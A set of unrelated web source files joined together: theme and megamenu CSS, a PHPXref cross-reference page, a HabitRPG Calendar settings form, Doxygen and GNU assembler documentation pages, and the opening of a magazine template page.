ul#filter-sidebar li.current a, ul#filter-sidebar a:hover { text-decoration: none; color:#ff9933; }
ul#filter-sidebar li.current a { color: #ff9933;}
.pagination li a:hover, .pagination li.current a, .page-numbers:hover, .pagination .current {
background: #ff9933;
}
ul.navigation-sidebar li.current a, ul.navigation-sidebar a:hover { text-decoration: none; color:#ff9933; }
ul.navigation-sidebar li.current a { color: #ff99330;}
ul.navigation-sidebar a:hover {
color:#ff9933;
}
.new-item {
background-color:#FF9933;
}
.featured {
background-color:#FF9933;
}
.more{
background-color:#FF9933;
}
.ca-more{
background-color:#FF9933;
}
.ca-close{
background-color:#FF9933;
}
.ca-item .title {
background-color:#FF9933;
}
.mega-button {
background-color:#FF9933;
}
.ca-content .live {
background-color:#FF9933;
}
.ca-content .buy {
background-color:#FF9933;
}
.va-slice h3:hover{
color:#FF9933;
}
.va-slice ul li a{
background:#FF9933;
}
.va-more{
background-color:#FF9933;
} |
templates/bt_real_estate/local/css/themes/cyan/megamenu.css | Tommar/remate | .t3-megamenu .mega-inner {
padding: 12px;
*zoom: 1;
}
.t3-megamenu .mega-inner:before,
.t3-megamenu .mega-inner:after {
display: table;
content: "";
line-height: 0;
}
.t3-megamenu .mega-inner:after {
clear: both;
}
.t3-megamenu .row-fluid + .row-fluid {
padding-top: 12px;
border-top: 1px solid #eee;
}
.t3-megamenu .mega > .mega-dropdown-menu {
min-width: 200px;
display: none;
}
.t3-megamenu .mega.open > .mega-dropdown-menu,
.t3-megamenu .mega.dropdown-submenu:hover > .mega-dropdown-menu {
display: block;
}
.t3-megamenu .mega-group {
*zoom: 1;
}
.t3-megamenu .mega-group:before,
.t3-megamenu .mega-group:after {
display: table;
content: "";
line-height: 0;
}
.t3-megamenu .mega-group:after {
clear: both;
}
.t3-megamenu .mega-nav .mega-group > .mega-group-title,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .mega-group-title,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .mega-group-title {
background: inherit;
color: inherit;
font-weight: bold;
padding: 0;
margin: 0;
}
.t3-megamenu .mega-nav .mega-group > .mega-group-title:hover,
.t3-megamenu .mega-nav .mega-group > .mega-group-title:active,
.t3-megamenu .mega-nav .mega-group > .mega-group-title:focus,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .mega-group-title:hover,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .mega-group-title:active,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .mega-group-title:focus,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .mega-group-title:hover,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .mega-group-title:active,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .mega-group-title:focus {
background: inherit;
color: inherit;
}
.t3-megamenu .mega-group-ct {
margin: 0;
padding: 0;
*zoom: 1;
}
.t3-megamenu .mega-group-ct:before,
.t3-megamenu .mega-group-ct:after {
display: table;
content: "";
line-height: 0;
}
.t3-megamenu .mega-group-ct:after {
clear: both;
}
.t3-megamenu .span12.mega-col-nav .mega-inner {
padding: 5px;
}
.t3-megamenu .mega-group .span12.mega-col-nav .mega-inner {
padding: 0;
}
.t3-megamenu .mega-nav,
.t3-megamenu .dropdown-menu .mega-nav {
margin: 0;
padding: 0;
list-style: none;
}
.t3-megamenu .mega-nav > li,
.t3-megamenu .dropdown-menu .mega-nav > li {
list-style: none;
margin-left: 0;
}
.t3-megamenu .mega-nav > li a,
.t3-megamenu .dropdown-menu .mega-nav > li a {
white-space: normal;
}
.t3-megamenu .mega-group > .mega-nav,
.t3-megamenu .dropdown-menu .mega-group > .mega-nav {
margin-left: -5px;
margin-right: -5px;
}
.t3-megamenu .mega-nav .dropdown-submenu > a::after {
margin-right: 5px;
}
.t3-megamenu .t3-module {
margin-bottom: 10px;
}
.t3-megamenu .t3-module .module-title {
margin-bottom: 0;
}
.t3-megamenu .t3-module .module-ct {
margin: 0;
padding: 0;
}
.t3-megamenu .mega-align-left > .dropdown-menu {
left: 0;
}
.t3-megamenu .mega-align-right > .dropdown-menu {
left: auto;
right: 0;
}
.t3-megamenu .mega-align-center > .dropdown-menu {
left: 50%;
transform: translate(-50%);
-webkit-transform: translate(-50%);
-moz-transform: translate(-50%);
-ms-transform: translate(-50%);
-o-transform: translate(-50%);
}
.t3-megamenu .dropdown-submenu.mega-align-left > .dropdown-menu {
left: 100%;
}
.t3-megamenu .dropdown-submenu.mega-align-right > .dropdown-menu {
left: auto;
right: 100%;
}
.t3-megamenu .mega-align-justify {
position: static;
}
.t3-megamenu .mega-align-justify > .dropdown-menu {
left: 0;
margin-left: 0;
top: auto;
}
.t3-megamenu .mega-caption {
display: block;
white-space: nowrap;
}
.t3-megamenu .nav .caret,
.t3-megamenu .dropdown-submenu .caret,
.t3-megamenu .mega-menu .caret {
display: none;
}
.t3-megamenu .nav > .dropdown > .dropdown-toggle .caret {
display: inline-block;
}
.t3-megamenu .nav [class^="icon-"],
.t3-megamenu .nav [class*=" icon-"] {
margin-right: 5px;
}
@media (min-width: 768px) {
.t3-megamenu.animate .mega > .mega-dropdown-menu {
transition: all 400ms;
-webkit-transition: all 400ms;
-ms-transition: all 400ms;
-o-transition: all 400ms;
-webkit-backface-visibility: hidden;
-moz-backface-visibility: hidden;
-o-backface-visibility: hidden;
backface-visibility: hidden;
opacity: 0;
}
.t3-megamenu.animate .mega.animating > .mega-dropdown-menu {
display: block !important;
}
.t3-megamenu.animate .mega.open > .mega-dropdown-menu,
.t3-megamenu.animate .mega.animating.open > .mega-dropdown-menu {
opacity: 1;
}
.t3-megamenu.animate.zoom .mega > .mega-dropdown-menu {
-webkit-transform: scale(0, 0);
-moz-transform: scale(0, 0);
-ms-transform: scale(0, 0);
-o-transform: scale(0, 0);
transform: scale(0, 0);
-webkit-transform-origin: 20% 20%;
-moz-transform-origin: 20% 20%;
transform-origin: 20% 20%;
}
.t3-megamenu.animate.zoom .mega.open > .mega-dropdown-menu {
-webkit-transform: scale(1, 1);
-moz-transform: scale(1, 1);
-ms-transform: scale(1, 1);
-o-transform: scale(1, 1);
transform: scale(1, 1);
}
.t3-megamenu.animate.zoom .level0 > .mega-align-center > .mega-dropdown-menu {
-webkit-transform: scale(0,0) translate(-50%,0);
-ms-transform: scale(0,0) translate(-50%,0);
transform: scale(0,0) translate(-50%,0);
-webkit-transform-origin: 0% 20%;
-moz-transform-origin: 0% 20%;
transform-origin: 0% 20%;
}
.t3-megamenu.animate.zoom .level0 > .mega-align-center.open > .mega-dropdown-menu {
-webkit-transform: scale(1,1) translate(-50%,0);
-ms-transform: scale(1,1) translate(-50%,0);
transform: scale(1,1) translate(-50%,0);
}
.t3-megamenu.animate.elastic .mega > .mega-dropdown-menu {
-webkit-transform: scale(0, 1);
-moz-transform: scale(0, 1);
-ms-transform: scale(0, 1);
-o-transform: scale(0, 1);
transform: scale(0, 1);
-webkit-transform-origin: 10% 0;
-moz-transform-origin: 10% 0;
transform-origin: 10% 0;
}
.t3-megamenu.animate.elastic .mega.open > .mega-dropdown-menu {
-webkit-transform: scale(1, 1);
-moz-transform: scale(1, 1);
-ms-transform: scale(1, 1);
-o-transform: scale(1, 1);
transform: scale(1, 1);
}
.t3-megamenu.animate.elastic .level0 > .mega > .mega-dropdown-menu {
-webkit-transform: scale(1, 0);
-moz-transform: scale(1, 0);
-ms-transform: scale(1, 0);
-o-transform: scale(1, 0);
transform: scale(1, 0);
}
.t3-megamenu.animate.elastic .level0 .open > .mega-dropdown-menu {
-webkit-transform: scale(1, 1);
-moz-transform: scale(1, 1);
-ms-transform: scale(1, 1);
-o-transform: scale(1, 1);
transform: scale(1, 1);
}
.t3-megamenu.animate.elastic .level0 > .mega-align-center > .mega-dropdown-menu {
transform: scale(1,0) translate(-50%,0);
-ms-transform: scale(1,0) translate(-50%,0);
-webkit-transform: scale(1,0) translate(-50%,0);
}
.t3-megamenu.animate.elastic .level0 > .mega-align-center.open > .mega-dropdown-menu {
transform: scale(1,1) translate(-50%,0);
-ms-transform: scale(1,1) translate(-50%,0);
-webkit-transform: scale(1,1) translate(-50%,0);
}
.t3-megamenu.animate.slide {
}
.t3-megamenu.animate.slide .mega {
}
.t3-megamenu.animate.slide .mega.animating > .mega-dropdown-menu {
overflow: hidden;
}
.t3-megamenu.animate.slide .mega > .mega-dropdown-menu > div {
transition: all 400ms;
-webkit-transition: all 400ms;
-ms-transition: all 400ms;
-o-transition: all 400ms;
-webkit-backface-visibility: hidden;
-moz-backface-visibility: hidden;
-o-backface-visibility: hidden;
backface-visibility: hidden;
margin-top: -100%;
}
.t3-megamenu.animate.slide .mega.open > .mega-dropdown-menu > div {
margin-top: 0%;
}
.t3-megamenu.animate.slide .mega .mega > .mega-dropdown-menu {
min-width: 0;
}
.t3-megamenu.animate.slide .mega .mega > .mega-dropdown-menu > div {
min-width: 200px;
margin-top: 0;
margin-left: -500px;
}
.t3-megamenu.animate.slide .mega .mega.open > .mega-dropdown-menu > div {
margin-left: 0;
}
}
.t3-megamenu .mega-inner {
padding: 12px 24px;
}
.t3-megamenu .row-fluid + .row-fluid {
border-top: 1px solid #ddd;
}
.t3-megamenu .mega-nav .mega-group > .mega-group-title,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .mega-group-title,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .mega-group-title {
background: inherit;
font-size: 15px;
font-weight: bold;
font-family: 'Open Sans', sans-serif;
text-transform: uppercase;
border-bottom: 1px solid #565553;
margin-bottom: 0;
padding: 5px 0;
width: 100%;
display: inline-block;
}
.t3-megamenu .mega-nav .mega-group > .mega-group-title:hover,
.t3-megamenu .mega-nav .mega-group > .mega-group-title:active,
.t3-megamenu .mega-nav .mega-group > .mega-group-title:focus,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .mega-group-title:hover,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .mega-group-title:active,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .mega-group-title:focus,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .mega-group-title:hover,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .mega-group-title:active,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .mega-group-title:focus {
background: inherit;
color: #fff;
}
.t3-megamenu .mega-nav > li a,
.t3-megamenu .dropdown-menu .mega-nav > li a {
padding: 5px 12px;
}
.t3-megamenu .mega-nav .dropdown-submenu > a::after {
margin-right: 0;
}
.t3-megamenu .t3-module .module-title {
background: inherit;
border-bottom: 1px solid #565553;
font-family: 'Open Sans', sans-serif;
font-size: 15px;
font-weight: bold;
margin-bottom: 18px;
padding: 5px 0;
line-height: 24px;
text-transform: uppercase;
}
.t3-megamenu .t3-module ul,
.t3-megamenu .t3-module .nav {
margin: 0 0 0 15px;
}
.t3-megamenu .t3-module ul li,
.t3-megamenu .t3-module .nav li {
list-style: disc;
display: list-item;
float: none;
margin: 0;
padding: 0;
border: 0;
}
.t3-megamenu .t3-module ul li a,
.t3-megamenu .t3-module .nav li a {
display: inline;
padding: 0;
margin: 0;
border: 0;
font-size: 100%;
background: none;
font: inherit;
white-space: normal;
}
.t3-megamenu .t3-module ul li a:hover,
.t3-megamenu .t3-module ul li a:focus,
.t3-megamenu .t3-module ul li a:active,
.t3-megamenu .t3-module .nav li a:hover,
.t3-megamenu .t3-module .nav li a:focus,
.t3-megamenu .t3-module .nav li a:active {
background: none;
color: inherit;
font: inherit;
}
.t3-mainnav .navbar .nav > li > .dropdown-menu.mega-dropdown-menu {
background: url('../../../../images/bg-megamenu.png') top left;
border-radius: 0;
border-left: 0 !important;
border-bottom: 0 !important;
border-right: 0 !important;
border-top: 5px solid #4eada1;
}
.t3-mainnav .dropdown-menu li > a:hover {
color: #4eada1;
}
.navbar .nav li.dropdown > .dropdown-toggle .caret {
border-bottom-color: #fff;
border-top-color: #fff;
}
.navbar .nav li.dropdown > a:hover .caret,
.navbar .nav li.dropdown > a:focus .caret {
border-bottom-color: #4eada1;
border-top-color: #4eada1;
}
.t3-mainnav .dropdown-menu .color li > a {
background: none;
padding-left: 0;
}
.t3-mainnav .dropdown-menu .color li > a:hover {
background: none;
}
.t3-mainnav .dropdown-menu .color li > a img {
padding-right: 8px;
}
.t3-megamenu .mega-col-nav .span12.mega-col-nav:first-child .mega-inner,
.t3-megamenu .mega-col-nav .span12.mega-col-module:first-child .mega-inner {
padding: 5px 0;
}
.t3-megamenu .span12.mega-col-nav:first-child .mega-inner,
.t3-megamenu .span12.mega-col-module:first-child .mega-inner {
padding: 12px;
} |
_variables/exact_match.html | mgsolipa/b2evolution_phpxref | <!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
<title>PHPXRef 0.7.1 : Unnamed Project : Variable Reference: $exact_match</title>
<link rel="stylesheet" href="../sample.css" type="text/css">
<link rel="stylesheet" href="../sample-print.css" type="text/css" media="print">
<style id="hilight" type="text/css"></style>
<meta http-equiv="content-type" content="text/html;charset=iso-8859-1">
</head>
<body bgcolor="#ffffff" text="#000000" link="#801800" vlink="#300540" alink="#ffffff">
<table class="pagetitle" width="100%">
<tr>
<td valign="top" class="pagetitle">
[ <a href="../index.html">Index</a> ]
</td>
<td align="right" class="pagetitle">
<h2 style="margin-bottom: 0px">PHP Cross Reference of Unnamed Project</h2>
</td>
</tr>
</table>
<!-- Generated by PHPXref 0.7.1 at Sat Nov 21 22:13:19 2015 -->
<!-- PHPXref (c) 2000-2010 Gareth Watts - gareth@omnipotent.net -->
<!-- http://phpxref.sourceforge.net/ -->
<script src="../phpxref.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript">
<!--
ext='.html';
relbase='../';
subdir='_variables';
filename='index.html';
cookiekey='phpxref';
handleNavFrame(relbase, subdir, filename);
logVariable('exact_match');
// -->
</script>
<script language="JavaScript" type="text/javascript">
if (gwGetCookie('xrefnav')=='off')
document.write('<p class="navlinks">[ <a href="javascript:navOn()">Show Explorer<\/a> ]<\/p>');
else
document.write('<p class="navlinks">[ <a href="javascript:navOff()">Hide Explorer<\/a> ]<\/p>');
</script>
<noscript>
<p class="navlinks">
[ <a href="../nav.html" target="_top">Show Explorer</a> ]
[ <a href="index.html" target="_top">Hide Navbar</a> ]
</p>
</noscript>
[<a href="../index.html">Top level directory</a>]<br>
<script language="JavaScript" type="text/javascript">
<!--
document.writeln('<table align="right" class="searchbox-link"><tr><td><a class="searchbox-link" href="javascript:void(0)" onMouseOver="showSearchBox()">Search</a><br>');
document.writeln('<table border="0" cellspacing="0" cellpadding="0" class="searchbox" id="searchbox">');
document.writeln('<tr><td class="searchbox-title">');
document.writeln('<a class="searchbox-title" href="javascript:showSearchPopup()">Search History +</a>');
document.writeln('<\/td><\/tr>');
document.writeln('<tr><td class="searchbox-body" id="searchbox-body">');
document.writeln('<form name="search" style="margin:0px; padding:0px" onSubmit=\'return jump()\'>');
document.writeln('<a class="searchbox-body" href="../_classes/index.html">Class<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="classname"><br>');
document.writeln('<a id="funcsearchlink" class="searchbox-body" href="../_functions/index.html">Function<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="funcname"><br>');
document.writeln('<a class="searchbox-body" href="../_variables/index.html">Variable<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="varname"><br>');
document.writeln('<a class="searchbox-body" href="../_constants/index.html">Constant<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="constname"><br>');
document.writeln('<a class="searchbox-body" href="../_tables/index.html">Table<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="tablename"><br>');
document.writeln('<input type="submit" class="searchbox-button" value="Search">');
document.writeln('<\/form>');
document.writeln('<\/td><\/tr><\/table>');
document.writeln('<\/td><\/tr><\/table>');
// -->
</script>
<div id="search-popup" class="searchpopup"><p id="searchpopup-title" class="searchpopup-title">title</p><div id="searchpopup-body" class="searchpopup-body">Body</div><p class="searchpopup-close"><a href="javascript:gwCloseActive()">[close]</a></p></div>
<h3>Variable Cross Reference</h3>
<h2><a href="index.html#exact_match">$exact_match</a></h2>
<b>Defined at:</b><ul>
<li><a href="../inc/items/model/_item.funcs.php.html">/inc/items/model/_item.funcs.php</A> -> <a href="../inc/items/model/_item.funcs.php.source.html#l420"> line 420</A></li>
<li><a href="../inc/items/model/_item.funcs.php.html">/inc/items/model/_item.funcs.php</A> -> <a href="../inc/items/model/_item.funcs.php.source.html#l429"> line 429</A></li>
</ul>
<br><b>Referenced 3 times:</b><ul>
<li><a href="../inc/items/model/_item.funcs.php.html">/inc/items/model/_item.funcs.php</a> -> <a href="../inc/items/model/_item.funcs.php.source.html#l420"> line 420</a></li>
<li><a href="../inc/items/model/_item.funcs.php.html">/inc/items/model/_item.funcs.php</a> -> <a href="../inc/items/model/_item.funcs.php.source.html#l429"> line 429</a></li>
<li><a href="../inc/items/model/_item.funcs.php.html">/inc/items/model/_item.funcs.php</a> -> <a href="../inc/items/model/_item.funcs.php.source.html#l448"> line 448</a></li>
</ul>
<!-- A link to the phpxref site in your customized footer file is appreciated ;-) -->
<br><hr>
<table width="100%">
<tr><td>Generated: Sat Nov 21 22:13:19 2015</td>
<td align="right"><i>Cross-referenced by <a href="http://phpxref.sourceforge.net/">PHPXref 0.7.1</a></i></td>
</tr>
</table>
</body></html>
|
static/settings.html | DXsmiley/HabitRPG-Calendar | <html>
<head>
<link href="/static/normalise.css" rel="stylesheet" type="text/css" \>
<link href="/static/index.css" rel="stylesheet" type="text/css" \>
<link href="/favicon.ico" rel="stylesheet" type="image/ico" \>
<title>
HabitRPG Calendar
</title>
</head>
<body>
<div class="container">
<div class="banner">
<div class="internal">
<h2>We'll need some of your info</h2>
<form action="/settings" method="post">
<table>
<tr>
<td class="leftside"> UUID </td>
<td class="rightside"> <input type="text" name="uuid" /> </td>
</tr>
<tr>
<td class="leftside"> API Key </td>
<td class="rightside"> <input type="password" name="ukey" /> </td>
</tr>
<tr>
<td class="leftside"> Timezone </td>
<td class="rightside"> <input id="timezone-input" type="number" name="timezone" value="0"/> </td>
</tr>
<tr>
<td class="leftside"> Remember Me </td>
<td class="rightside"> <input type="checkbox" name="remember" value="0"/> </td>
</tr>
</table>
<br>
<input type="submit" value="Let's go!">
<!-- I know this is an inline style, I'll fix it later... maybe. -->
<p style="max-width: 500px; opacity: 0.8; margin-top: 40px;">If you're using the habitica website, you can find your UUID and API Key by clicking the gear in the top right, and then clicking on "API".</p>
</form>
</div>
</div>
</div>
<div class="support">
<p>Created by <a href="https://github.com/DXsmiley" target="_blank">DXsmiley</a></p>
</div>
<script type="text/javascript">
// Determine user's current time zone, auto-populate the field
var offset = -new Date().getTimezoneOffset() / 60;
document.getElementById("timezone-input").value = '' + offset;
</script>
</body>
</html>
|
doc/html/structfgsl_1_1fgsl__multifit__function.html | reinh-bader/fgsl | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" content="Doxygen 1.8.17"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<title>FGSL: fgsl::fgsl_multifit_function Type Reference</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="search/search.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="search/searchdata.js"></script>
<script type="text/javascript" src="search/search.js"></script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
<tbody>
<tr style="height: 56px;">
<td id="projectalign" style="padding-left: 0.5em;">
<div id="projectname">FGSL
</div>
<div id="projectbrief">Fortran interface for the GNU scientific library</div>
</td>
</tr>
</tbody>
</table>
</div>
<!-- end header part -->
<!-- Generated by Doxygen 1.8.17 -->
<script type="text/javascript">
/* @license magnet:?xt=urn:btih:cf05388f2679ee054f2beb29a391d25f4e673ac3&dn=gpl-2.0.txt GPL-v2 */
var searchBox = new SearchBox("searchBox", "search",false,'Search');
/* @license-end */
</script>
<script type="text/javascript" src="menudata.js"></script>
<script type="text/javascript" src="menu.js"></script>
<script type="text/javascript">
/* @license magnet:?xt=urn:btih:cf05388f2679ee054f2beb29a391d25f4e673ac3&dn=gpl-2.0.txt GPL-v2 */
$(function() {
initMenu('',true,false,'search.php','Search');
$(document).ready(function() { init_search(); });
});
/* @license-end */</script>
<div id="main-nav"></div>
<!-- window showing the filter options -->
<div id="MSearchSelectWindow"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
onkeydown="return searchBox.OnSearchSelectKey(event)">
</div>
<!-- iframe showing the search results (closed by default) -->
<div id="MSearchResultsWindow">
<iframe src="javascript:void(0)" frameborder="0"
name="MSearchResults" id="MSearchResults">
</iframe>
</div>
<div id="nav-path" class="navpath">
<ul>
<li class="navelem"><a class="el" href="namespacefgsl.html">fgsl</a></li><li class="navelem"><a class="el" href="structfgsl_1_1fgsl__multifit__function.html">fgsl_multifit_function</a></li> </ul>
</div>
</div><!-- top -->
<div class="header">
<div class="summary">
<a href="#pub-attribs">Public Attributes</a> |
<a href="structfgsl_1_1fgsl__multifit__function-members.html">List of all members</a> </div>
<div class="headertitle">
<div class="title">fgsl::fgsl_multifit_function Type Reference</div> </div>
</div><!--header-->
<div class="contents">
<table class="memberdecls">
<tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="pub-attribs"></a>
Public Attributes</h2></td></tr>
<tr class="memitem:a81b590be8daf3e68d5a568a1b9cd9d17"><td class="memItemLeft" align="right" valign="top">type(c_ptr) </td><td class="memItemRight" valign="bottom"><a class="el" href="structfgsl_1_1fgsl__multifit__function.html#a81b590be8daf3e68d5a568a1b9cd9d17">gsl_multifit_function</a> = c_null_ptr</td></tr>
<tr class="separator:a81b590be8daf3e68d5a568a1b9cd9d17"><td class="memSeparator" colspan="2"> </td></tr>
</table>
<h2 class="groupheader">Member Data Documentation</h2>
<a id="a81b590be8daf3e68d5a568a1b9cd9d17"></a>
<h2 class="memtitle"><span class="permalink"><a href="#a81b590be8daf3e68d5a568a1b9cd9d17">◆ </a></span>gsl_multifit_function</h2>
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">type(c_ptr) fgsl::fgsl_multifit_function::gsl_multifit_function = c_null_ptr</td>
</tr>
</table>
</div><div class="memdoc">
</div>
</div>
<hr/>The documentation for this type was generated from the following file:<ul>
<li><a class="el" href="fgsl_8F90.html">fgsl.F90</a></li>
</ul>
</div><!-- contents -->
<!-- start footer part -->
<hr class="footer"/><address class="footer"><small>
Generated on Fri Jul 30 2021 02:14:31 for FGSL by  <a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/>
</a> 1.8.17
</small></address>
</body>
</html>
|
bin/arm-2012.09/share/doc/arm-arm-none-eabi/html/as.html/RL78_002dModifiers.html | Motorhead1991/samsung_kernel_comanche | <html lang="en">
<head>
<title>RL78-Modifiers - Using as</title>
<meta http-equiv="Content-Type" content="text/html">
<meta name="description" content="Using as">
<meta name="generator" content="makeinfo 4.13">
<link title="Top" rel="start" href="index.html#Top">
<link rel="up" href="RL78_002dDependent.html#RL78_002dDependent" title="RL78-Dependent">
<link rel="prev" href="RL78_002dOpts.html#RL78_002dOpts" title="RL78-Opts">
<link rel="next" href="RL78_002dDirectives.html#RL78_002dDirectives" title="RL78-Directives">
<link href="http://www.gnu.org/software/texinfo/" rel="generator-home" title="Texinfo Homepage">
<!--
This file documents the GNU Assembler "as".
Copyright (C) 1991, 1992, 1993, 1994, 1995, 1996, 1997, 1998, 1999,
2000, 2001, 2002, 2006, 2007, 2008, 2009, 2010, 2011 Free Software Foundation,
Inc.
Permission is granted to copy, distribute and/or modify this document
under the terms of the GNU Free Documentation License, Version 1.3
or any later version published by the Free Software Foundation;
with no Invariant Sections, with no Front-Cover Texts, and with no
Back-Cover Texts. A copy of the license is included in the
section entitled ``GNU Free Documentation License''.
-->
<meta http-equiv="Content-Style-Type" content="text/css">
<style type="text/css"><!--
pre.display { font-family:inherit }
pre.format { font-family:inherit }
pre.smalldisplay { font-family:inherit; font-size:smaller }
pre.smallformat { font-family:inherit; font-size:smaller }
pre.smallexample { font-size:smaller }
pre.smalllisp { font-size:smaller }
span.sc { font-variant:small-caps }
span.roman { font-family:serif; font-weight:normal; }
span.sansserif { font-family:sans-serif; font-weight:normal; }
--></style>
<link rel="stylesheet" type="text/css" href="../cs.css">
</head>
<body>
<div class="node">
<a name="RL78-Modifiers"></a>
<a name="RL78_002dModifiers"></a>
<p>
Next: <a rel="next" accesskey="n" href="RL78_002dDirectives.html#RL78_002dDirectives">RL78-Directives</a>,
Previous: <a rel="previous" accesskey="p" href="RL78_002dOpts.html#RL78_002dOpts">RL78-Opts</a>,
Up: <a rel="up" accesskey="u" href="RL78_002dDependent.html#RL78_002dDependent">RL78-Dependent</a>
<hr>
</div>
<h4 class="subsection">9.33.2 Symbolic Operand Modifiers</h4>
<p><a name="index-RL78-modifiers-1639"></a><a name="index-syntax_002c-RL78-1640"></a>
The RL78 has three modifiers that adjust the relocations used by the
linker:
<dl>
<dt><code>%lo16()</code><dd>
When loading a 20-bit (or wider) address into registers, this modifier
selects the 16 least significant bits.
<pre class="smallexample"> movw ax,#%lo16(_sym)
</pre>
<br><dt><code>%hi16()</code><dd>
When loading a 20-bit (or wider) address into registers, this modifier
selects the 16 most significant bits.
<pre class="smallexample"> movw ax,#%hi16(_sym)
</pre>
<br><dt><code>%hi8()</code><dd>
When loading a 20-bit (or wider) address into registers, this modifier
selects the 8 bits that would go into CS or ES (i.e. bits 23..16).
<pre class="smallexample"> mov es, #%hi8(_sym)
</pre>
</dl>
</body></html>
|
portfolios/magzy/original_style.html | mazhar266/mazhar266.github.io | <!DOCTYPE html>
<html class="no-js" lang="en" xmlns="http://www.w3.org/1999/html">
<head>
<meta charset="utf-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1.0"/>
<title>Magzy - Original Style</title>
<!-- styles -->
<link rel="stylesheet" href="css/foundation.css"/>
<link rel="stylesheet" href="css/jquery.bxslider.css"/>
<link rel="stylesheet" type="text/css" href="css/lightbox.css"/>
<link rel="stylesheet" href="style.css"/>
<!-- fonts+icons -->
<link href='http://fonts.googleapis.com/css?family=Raleway:400,700,500,300,900,800,600,200,100' rel='stylesheet'
type='text/css'>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css">
<!--<link rel="stylesheet" href="css/font-awesome-4.3.0/css/font-awesome.min.css">-->
<!-- scripts -->
<script src="js/vendor/modernizr.js"></script>
</head>
<body>
<!--start header-->
<header>
<!-- top-menu secion -->
<section class="fixed_1 top_menu">
<div class="row">
<div class="small-12 medium-4 large-4 columns">
<div class="left_top_menu">
<ul class="inline-list">
<li><a href="#">About</a></li>
<li><a href="#">Advertise</a></li>
<li><a href="#">Contact Us</a></li>
</ul>
</div>
</div>
<div class="small-12 medium-4 large-4 columns">
<p class="text-center">Sunday, January, 25, 2015</p>
</div>
<div class="small-12 medium-4 large-4 columns">
<div class="social_icons right">
<span>Follow Us</span>
<ul class="inline-list">
<li><a href="#"><i class="fa fa-facebook"></i></a></li>
<li><a href="#"><i class="fa fa-pinterest-p"></i></a></li>
<li><a href="#"><i class="fa fa-twitter"></i></a></li>
<li><a href="#"><i class="fa fa-google-plus"></i></a></li>
<li><a href="#"><i class="fa fa-instagram"></i></a></li>
</ul>
</div>
</div>
</div>
</section>
<div class="fixed_2 row">
<!-- ico -->
<span class="right sub_menu"><a href="#"><i class="fa fa-angle-up"></i></a></span>
</div>
<!-- Logo+title -->
<section class="fixed_3 head_logo text-center">
<div class="row">
<h1>Magzy</h1>
<h6>Best Magazine Template For Your News and Visitors</h6>
</div>
</section>
<!-- Main Navigation -->
<section class="main_menu">
<div class="row">
<div class="small-12 medium-12 large-12 columns">
<div class="off-canvas-wrap" data-offcanvas>
<div class="inner-wrap">
<div class="hybrid-bar">
<nav class="tab-bar">
<div class="title-area">
<div class="name">
<h1><a href="#"></a></h1>
</div>
</div>
<section class="right-small show-for-small">
<a class="right-off-canvas-toggle menu-icon" id="togs-test"
href="#"><span></span></a>
</section>
</nav>
<aside class="right-off-canvas-menu menu_list">
<ul class="off-canvas-list">
<!-- <li class="show-for-small"><label>Foundation</label></li> -->
<li><a href="#">Home</a></li>
<li class="active"><a href="#">Fashoin</a></li>
<li><a href="#">Lifestyle</a></li>
<li><a href="#">Tech</a></li>
<li><a href="#">Design</a></li>
<li><a href="#">Travel</a></li>
<li><a href="#">Elements</a></li>
<!--start sub menu level-1-->
<li class="level_menu">
<a data-dropdown="drop1" aria-controls="drop1" aria-expanded="false">Blog
<i class="fa fa-chevron-down"></i><i class="fa fa-chevron-up"></i>
</a>
<ul id="drop1" class="f-dropdown content" data-dropdown-content
aria-hidden="true" tabindex="-1">
<li><a href="#">This is a link</a></li>
<li class="divider"></li>
<li><a href="#">This is another</a></li>
<li class="divider"></li>
<li><a href="#">Yet another</a></li>
</ul>
<!--<div id="drop2" data-dropdown-content class="f-dropdown content"-->
<!--aria-hidden="true"-->
<!--tabindex="-1">-->
<!--<p>-->
<!--Some text that people will think is awesome! Some text that people will-->
<!--think-->
<!--is awesome! Some text that people will think is awesome!-->
<!--<a href="javascript:void(0)">This is a link</a>-->
<!--</p>-->
